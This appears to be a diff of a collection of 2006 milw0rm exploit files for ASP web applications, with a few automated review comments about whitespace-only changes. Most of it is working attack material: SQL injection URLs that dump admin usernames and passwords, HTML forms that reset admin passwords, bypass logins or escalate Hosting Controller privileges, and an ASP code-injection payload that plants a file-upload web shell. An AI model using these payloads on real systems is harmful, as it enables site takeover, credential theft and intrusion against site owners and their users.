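Review bot: `#Vulnerabale versions` in the advisory header is a typo for `Vulnerable`, and the `</p>` that follows the hidden `action` input closes the `<p>` opened before the `<form>` tag, so the paragraph and the form are mis-nested. Both sides of the hunk are otherwise identical, so this whitespace-only change leaves both as they are; if the file is going to be rewritten anyway, fixing the header typo would be cheap.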
@ -1,79 +1,79 @@
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01]
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01]
@ -1,8 +1,8 @@
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir
Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03]
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir
Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03]
@ -1,12 +1,12 @@
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>
# milw0rm.com [2006-06-06]
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>
# milw0rm.com [2006-06-06]
@ -12,5 +12,5 @@
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
# nukedx.com [2006-06-11]
# milw0rm.com [2006-06-11]
# milw0rm.com [2006-06-11]
@ -1,9 +1,9 @@
# There is Sql injection WeBBoA Host Script v1.1
# Risk=High
# Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa
# milw0rm.com [2006-06-19]
# There is Sql injection WeBBoA Host Script v1.1
# Risk=High
# Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa
# milw0rm.com [2006-06-19]
@ -1,51 +1,51 @@
/*------------------------------------------------
IHS Public advisory
-------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com
Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at:
http://www.IHSteam.com
http://www.hamid.ir/security/
Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection :
Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236
Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code.
Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ...
Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 )
# milw0rm.com [2006-06-19]
/*------------------------------------------------
IHS Public advisory
-------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com
Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at:
http://www.IHSteam.com
http://www.hamid.ir/security/
Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection :
Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236
Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code.
Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></textarea></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
|
||||
[m.r.roohian]
|
||||
attacker can upload "cmd.asp" with this uploader and ...
|
||||
|
||||
|
||||
Solution:
|
||||
use ASP Stats Generator v2.1.2 (18/06/2006 )
|
||||
|
||||
# milw0rm.com [2006-06-19]
|
||||
|
|
|
@ -1,181 +1,181 @@
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006

-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------

<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================

-------------------------------------------------------------------------------------

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)

# milw0rm.com [2006-07-06]
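Review bot: the old and new sides of this 181-line hunk render identically, so whatever actually changed (most likely line endings or trailing whitespace) is invisible in the diff; a whole-file rewrite of this kind should be labelled as a whitespace-only change in the commit message, or split into its own commit, so that reviewers do not mistake it for an edit of the advisory's content.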
@ -1,12 +1,12 @@
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE
#Contact:admin@asianeagle.org


#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201

# milw0rm.com [2006-08-07]
@ -1,22 +1,22 @@
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE #
#Site : www.asianeagle.org #
#Contact: admin@asianeagle.org #
###############################################################
#Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar


#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201

#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201


#Greetz: Str0ke
Forever milw0rm ;)

# milw0rm.com [2006-08-14]
@ -1,27 +1,27 @@
################################################################################
## ##

## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## Credit by | Chironex Fleckeri ##

## Mail | ChironeX.FleckeriX@Gmail.Com ##

## Googledork | Powered By SimpleBlog 2.0 ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## ##
################################################################################

############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################

###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################

# milw0rm.com [2006-08-20]
@ -1,27 +1,27 @@
################################################################################
## ##

## LBlog <= "comments.asp" SQL Injection Exploit ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## Credit by | Chironex Fleckeri ##

## Mail | ChironeX.FleckeriX@Gmail.Com ##

## Googledork | Powered By LBlog ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## ##
################################################################################

###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################

#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################

# milw0rm.com [2006-08-20]
@ -1,16 +1,16 @@
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site : www.asianeagle.org
#Contact: admin@asianeagle.org


#Link : http://www.aspindir.com/Goster/4350
#Demo Portal : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script

#Exploit :
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201

#BURCU Seni hep sevdim hep sevicem.

# milw0rm.com [2006-09-03]
@ -1,74 +1,74 @@
_ _
__ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_|
|_| AnD
_ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|

+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net |
| App Version: <= 2.3 |
| App Type: Blog/Journal |
+-----------------------------------------------------------------+
| DETAILS |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri |
+-----------------------------------------------------------------+
| CODE |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. |
| |
| Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+
| EXPLOIT |
+-----------------------------------------------------------------+
| SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+
| SHOUTZ |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net |
+-----------------------------------------------------------------+
| PERSONAL STUFF |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+

__
___ ___ / _|
/ _ \/ _ \| |_
| __/ (_) | _|
\___|\___/|_|.

# milw0rm.com [2006-09-04]
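Review bot: this 74-line hunk again shows no visible difference between its two sides, and the file opens and closes with ASCII-art banners whose shape depends entirely on runs of spaces (the rendering here has already collapsed them); if the rewrite is a whitespace normalization such as trailing-space stripping or tab expansion, confirm that the new side keeps those banner lines byte-for-byte, since nothing else in the hunk justifies touching the file.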
@ -1,23 +1,23 @@
################################################################################
## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################

##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################

# milw0rm.com [2006-09-05]
################################################################################
|
||||
## ##
|
||||
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## ##
|
||||
################################################################################
|
||||
|
||||
##########################################################################################################################################################
|
||||
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
|
||||
##########################################################################################################################################################
|
||||
|
||||
##########################################################################################################################################################
|
||||
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
|
||||
##########################################################################################################################################################
|
||||
|
||||
################################################################
|
||||
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
|
||||
